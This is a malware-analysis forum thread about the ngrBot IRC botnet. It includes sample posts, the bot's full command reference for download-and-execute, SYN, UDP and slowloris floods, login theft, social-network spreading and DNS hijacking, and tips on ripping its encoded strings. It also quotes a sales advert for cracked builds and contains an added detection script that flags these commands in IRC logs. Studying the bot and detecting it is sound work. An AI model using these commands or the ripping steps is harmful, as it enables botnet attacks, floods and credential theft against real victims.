A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #8263  by EP_X0FF
 Thu Aug 25, 2011 5:31 am
Another sample.

Attached: original + unpacked.

Original (many detects on crypter only)
http://www.virustotal.com/file-scan/rep ... 1314249436

Unpacked
http://www.virustotal.com/file-scan/rep ... 1314249856
Attachments
pass: malware
(318.19 KiB) Downloaded 79 times
 #8278  by Xylitol
 Thu Aug 25, 2011 5:12 pm
Another 'hex' builder

ngrBot commands
ngrBot Commands

Note: parameters within "[" and "]" are required, and parameters within "<" and ">" are optional.

!dl [url] <md5> <-r> <-n>

	The bot downloads and executes a file from the specified URL.

	Parameters

	url        URL of the file to download and execute
	md5        optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot
	-r        Enable RusKill on downloaded file
	-n        Disables PDef+ on the system until reboot or until it is manually re-enabled

!up [url] [md5] <-r>

	The bot updates its file, but the update does not take effect until the system is restarted.

	Parameters

	url        URL of the file to update to
	md5        MD5 hash of the update file
	-r        Reboot immediately

!die

	The bot disconnects from the IRC server and does not reconnect until its system reboots.

!rm

	The bot will remove itself from the system.

!m [state]

	Enable/disable all output to IRC regarding commands and features.

	Parameters

	state    Enable (on) or disable (off) muting of all output to IRC

	The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.

!vs [url] [state]

	The bot creates a browser instance and visits the specified link.

	Parameters

	url        URL to open
	state    Open in a visible (1) or invisible (0) window

!rc <-n|-g>

	The bot disconnects from the IRC server and waits 15 seconds before reconnecting.

	Parameters

	-n    Only reconnect if the bot is currently marked as "new"
	-g    Only reconnect if the bot did not previously succeed in determining its country using GeoIP

!j [<[rule] [options]> channel] <key>

	The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.

	Parameters

	rule        Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
	options        Options for selected rule
	With -c,     you can put a single or multiple comma-separated country code(s)
	With -v,     you can put a single or multiple comma-separated version(s)
	channel        Channel to join
	key            Key of channel to join

!p [<[rule] [options]> channel]

	The bot parts the specified channel.

	Parameters

	rule        Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
	options        Options for selected rule
	With -c,     you can put a single or multiple comma-separated country code(s)
	With -v,     you can put a single or multiple comma-separated version(s)
	channel        Channel to part

!s <rule>

	The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).

	Parameters

	rule    Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)

!us <rule>

	The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).

	Parameters

	rule    Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)

!mod [module] [state]

	Enable/disable modules that use hooks.
	Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.
	
	Parameters

	module        Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi
	state        Enable (on) or disable (off) module

!stats <-l|-s>

	Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.

	Parameters

	-l    Display login grabber stats
	-s    Display spreading stats

!logins <site|-c>

	Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.

	Parameters

	site    Site to retrieve logins for (case insensitive, see here for the list of sites)
	-c        Clear login cache

!stop

	The bot will end all running flood tasks.

!ssyn [host] [port] [seconds]

	Parameters

	host        Host to flood with SYN requests.
	port        Port to flood. If 0, the bot uses a random port
	seconds        Number of seconds to flood the target

!udp [host] [port] [seconds]

	Parameters

	host        Host to flood with UDP packets
	port        Port to flood. If 0, the bot uses a random port
	seconds        Number of seconds to flood the target

!slow [host] [minutes]

	Parameters

	host        Host to flood using slowloris
	minutes        Number of minutes to flood the target

!msn.int [interval]

	Set the number of MSN messages in a conversation before one is changed with your spreading message. See here for more information.
	Note: use '#' for a random interval between 1 and 9.

	Parameters

	interval    Number of MSN messages before spread

!msn.set [message]

	Set the message that will be used for MSN spreading. See here for more information.
	Note: use '#' for a random digit and '*' for a random lowercase letter.
	
	Parameters

	message        Message to spread via MSN

!http.int [interval]

	Set the number of Facebook messages in a conversation before one is changed with your spreading message. See here for more information.
	Note: use '#' for a random interval between 1 and 9.

	Parameters

	interval    Number of Facebook messages before spread

!http.set [message]

	Set the message that will be used for Facebook spreading. See here for more information.
	Note: use '#' for a random digit and '*' for a random lowercase letter.

	Parameters

	message        Message to spread via Facebook

-------------------------

!mdns [url|[domain1 <domain2|ip2>]|[ip1 <ip2>]]

	The bot will block access to or redirect the specified domain/IP address.
	Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.

	Note: it must be the exact domain, for example "example.com" will not include "www.example.com". Wildcard support will be added in an update.

	Parameters

	url            Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.
	domain1        Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked
	ip1            Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked
	domain2        DNS queries for domain1 will be redirected to this domain if set
	ip2            DNS queries for ip1 or domain1 will be redirected to this IP address if set
4/44 >> 9.1%
http://www.virustotal.com/file-scan/rep ... 1314144944
Attachments
pwd: infected
(116.72 KiB) Downloaded 72 times
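The command reference quoted above is a ready-made signature set for network defenders: every ngrBot command is a plain-text IRC PRIVMSG whose first token is one of the documented `!` verbs, and each verb has a documented number of required `[...]` parameters. The script below is an added example (not from the forum post and not the bot's own code) that parses RFC 1459 PRIVMSG lines, flags messages whose first token is a documented ngrBot command, classifies them by the function described in the reference, and notes whether the documented required parameters are present. The IRC log lines, nicknames, hostnames and the MD5 value it scans are constructed for this demonstration; the command table is taken from the quoted list, and counting optional `<...>` parameters and `-x` flags as non-required is this example's own reading of the notation.

```python
"""Flag ngrBot-style IRC C2 commands in captured IRC traffic (defender-side triage).

Added example: the command names and required-argument counts come from the
command reference quoted in the thread; everything else (log lines, hosts,
category labels) is constructed here and is not part of the original post.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# command -> (number of required [..] parameters, category). Optional <..>
# parameters and -x flags are not counted (this example's reading of the notation).
NGRBOT_COMMANDS = {
    "!dl": (1, "download-execute"),  "!up": (2, "self-update"),
    "!die": (0, "control"),          "!rm": (0, "control"),
    "!m": (1, "control"),            "!rc": (0, "control"),
    "!vs": (2, "browser-visit"),
    "!j": (1, "channel"),            "!p": (1, "channel"),
    "!s": (0, "channel"),            "!us": (0, "channel"),
    "!mod": (2, "module"),           "!stats": (0, "recon"),
    "!logins": (0, "credential-theft"),
    "!stop": (0, "ddos"),            "!ssyn": (3, "ddos"),
    "!udp": (3, "ddos"),             "!slow": (2, "ddos"),
    "!msn.int": (1, "spreading"),    "!msn.set": (1, "spreading"),
    "!http.int": (1, "spreading"),   "!http.set": (1, "spreading"),
    "!mdns": (1, "dns-hijack"),
}

# RFC 1459 PRIVMSG with a prefix: ":nick!user@host PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(r"^:(?P<sender>\S+) PRIVMSG (?P<target>\S+) :(?P<text>.*)$")


@dataclass
class C2Hit:
    sender: str
    target: str
    command: str
    category: str
    args: List[str] = field(default_factory=list)
    complete: bool = True  # False when fewer than the documented required args are present


def parse_privmsg(line: str) -> Optional[dict]:
    """Return sender/target/text for a PRIVMSG line, or None for any other IRC message."""
    m = PRIVMSG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(line: str) -> Optional[C2Hit]:
    """Return a C2Hit if the message text starts with a documented ngrBot command."""
    msg = parse_privmsg(line)
    if msg is None:
        return None
    tokens = msg["text"].split()
    if not tokens:
        return None
    cmd = tokens[0].lower()  # case-insensitive match is an assumption of this example
    if cmd not in NGRBOT_COMMANDS:
        return None
    min_args, category = NGRBOT_COMMANDS[cmd]
    args = tokens[1:]
    positional = [a for a in args if not a.startswith("-")]  # flags never satisfy [..] params
    return C2Hit(msg["sender"], msg["target"], cmd, category, args, len(positional) >= min_args)


def scan(lines) -> List[C2Hit]:
    """Run classify() over a capture and keep only the hits."""
    return [hit for hit in (classify(l) for l in lines) if hit is not None]


def summarize(hits: List[C2Hit]) -> Counter:
    """Count hits per category, e.g. to prioritise ddos/dns-hijack/download-execute for IR."""
    return Counter(hit.category for hit in hits)


# Constructed sample capture (reserved example hosts; the MD5 is a made-up placeholder).
SAMPLE_IRC_LOG = [
    ":op!op@example.invalid PRIVMSG #chan :!dl http://example.invalid/f.bin 00000000000000000000000000000000 -r",
    ":op!op@example.invalid PRIVMSG #chan :!ssyn 198.51.100.7 80 600",
    ":op!op@example.invalid PRIVMSG #chan :!mdns example.com 203.0.113.5",
    ":op!op@example.invalid PRIVMSG #chan :!udp 198.51.100.7",          # missing port/seconds
    ":user!u@example.invalid PRIVMSG #chan :hello, !stats for the match are up",  # benign chatter
    "PING :irc.example.invalid",                                         # not a PRIVMSG
]

if __name__ == "__main__":
    found = scan(SAMPLE_IRC_LOG)
    for hit in found:
        flag = "" if hit.complete else " (incomplete args)"
        print(f"{hit.sender} -> {hit.target}: {hit.command} [{hit.category}]{flag}")
    print(dict(summarize(found)))
```

The `complete` flag is worth keeping in an alert: a verb with too few parameters is still interesting (an operator typing by hand, or a truncated capture) but should rank below a well-formed `!ssyn` or `!mdns`. Matching only the first token avoids firing on ordinary chat that happens to mention a word like `!stats` mid-sentence, at the cost of missing commands preceded by a nick prefix, which the quoted reference does not describe.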
 #8393  by Xylitol
 Sat Sep 03, 2011 11:43 pm
I've looked at ngrbot to see how difficult it is to 'rip', and it's really lame.

ecx tells the position of the part to decode, and the call below it decodes byte by byte

string decode 'routine'

part of decoded strings

you just have to replace them with the right strings and patch this lame crap (or, more simply, add your own string in the empty bytes and modify the rest of the code that connects, etc.)

I thought that would be harder, lol :|
 #8403  by Xylitol
 Sun Sep 04, 2011 5:55 pm
The following text is from a forum where it's being sold.
I am selling ngrBot bin's for sale.
These are not code hooks, these actually have 0 bytes of code patched.
I have reversed some bots and have the ability to produce legit bin's.

NO CODE is changed or altered in the binary.
This ensures maximum compatibility.

Please do not post here asking for a test bin.
Please do not post here asking for any samples.
There have been some leaked ngrBot binaries out for reversers.
Don't contact me to help you to reverse this please.
If you have reversed this yourself, that is good, but I have fubar's permission to do this.

I stand by this bot and believe it is one of the best out there by far right now.

I don't normally sell other peoples work, but right now I could use the $.
So I will be selling a limited amount of copies.

Should any domains get reported on either bot, if you contact me I will rebuild for free if you are a customer.

The binary I offer has 3 domains optional, and a list of settings and commands that can be specified upon purchase.
Channel, pass, and sethost can be specified.
SSL and other options are available/customizable.

Also I have some of the original files included with the package.
This includes all modules. This is truly an amazing bot.

Again these have not been patched, I make these builds by re-writing the settings and correctly fix other values, so there is no need for me to touch any of the code.

Originally my patch worked just fine, without any help, when I patched 1 byte of code before.
But after verifying with aadster, fubar told me the last part to fix, so no code is patched now.
Only the encrypted settings themselves are actually over-written.

If you're serious, maybe I will show you a demonstration in which I run a binary file from my vmware for you to test.
The file size is the SAME size as the leaked binary. Don't ask me where to find this, you can find it somewhere and reverse it yourself if you like.

Any sales made will forward commission to fubar, as I have his permission to sell builds for now.
Starting Price 300$ (includes unlimited domain rebuilds upon blacklisting)
LR only, after 1 or 2 customers price will go up 50$ for anyone else.
As for previous ngrBot customers you'll receive updated bins for $100 each until you've reached the full selling price, then updates will be free of charge.

I won't be selling anymore than 5 copies for now.
Like I said I'm not looking to get rich just short on $ and figure I would help some people who want to progress their activities.
Facebook spread in action:

If you would like to purchase a bin or the builder contact on jabber, xmpp: loadscc@xmpp.jp
 #8451  by Xylitol
 Wed Sep 07, 2011 2:16 pm
VT: 6/44 >> 13.6%
http://www.virustotal.com/file-scan/rep ... 1315403676
Detected as "P2P-Worm.Win32.Palevo" and "Trojan-Ransom.Win32.HmBlocker"
AV fails on the crypter, probably.
Attachments
pwd: infected
(122.65 KiB) Downloaded 62 times
 #8453  by EP_X0FF
 Wed Sep 07, 2011 3:12 pm
Two stage decryption/uncompressing process with hardcoded VM detection on board, zombie process spawning and memory injects.

And finally inside the same primitive crap
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
yes, detection on crypter only; see unpacked result, P2P worms and hmblockers magically disappear
http://www.virustotal.com/file-scan/rep ... 1315407782

Added.